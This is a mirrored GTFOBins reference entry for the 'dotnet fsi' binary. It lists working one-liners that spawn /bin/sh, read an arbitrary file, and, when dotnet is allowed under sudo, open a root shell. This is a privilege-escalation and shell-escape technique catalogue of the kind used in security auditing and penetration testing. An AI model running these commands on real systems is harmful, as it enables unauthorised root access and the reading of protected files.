mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-03-13 02:58:09 +01:00
17 lines
412 B
Markdown
17 lines
412 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
dotnet fsi
|
|
System.Diagnostics.Process.Start("/bin/sh").WaitForExit();;
|
|
file-read:
|
|
- code: |
|
|
export LFILE=file_to_read
|
|
dotnet fsi
|
|
System.IO.File.ReadAllText(System.Environment.GetEnvironmentVariable("LFILE"));;
|
|
sudo:
|
|
- code: |
|
|
sudo dotnet fsi
|
|
System.Diagnostics.Process.Start("/bin/sh").WaitForExit();;
|
|
---
|